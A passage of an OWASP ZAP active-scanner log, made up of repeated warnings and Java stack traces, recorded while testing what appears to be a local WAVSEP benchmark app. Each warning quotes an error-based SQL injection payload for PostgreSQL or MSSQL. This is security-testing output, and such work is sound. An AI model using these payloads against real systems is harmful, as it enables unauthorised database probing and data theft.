org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688234 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 6813=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6813=6813) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (6488=6488] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 6813=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6813=6813) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND (6488=6488 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688236 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 1485=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1485=1485) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 1485=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (1485=1485) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688238 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 3071=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3071=3071) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('NKji'='NKji] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 3071=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3071=3071) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND ('NKji'='NKji at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688239 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 8549=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8549=8549) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'ghsv'='ghsv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 8549=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8549=8549) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'ghsv'='ghsv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688241 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 6594=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6594=6594) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 6594=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (6594=6594) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688243 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7043=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7043=7043) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- KyPC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 7043=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (7043=7043) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- KyPC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688245 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 4117=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4117=4117) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (7721=7721] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 4117=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4117=4117) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (7721=7721 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688248 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 5001=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5001=5001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 5001=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5001=5001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688250 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 2247=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2247=2247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('akNO'='akNO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 2247=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2247=2247) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('akNO'='akNO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688251 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 6748=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6748=6748) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'GEnE'='GEnE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 6748=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6748=6748) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'GEnE'='GEnE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688253 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 6544=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6544=6544) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 6544=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6544=6544) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688255 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 2514=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2514=2514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- NKyK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 2514=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2514=2514) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- NKyK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 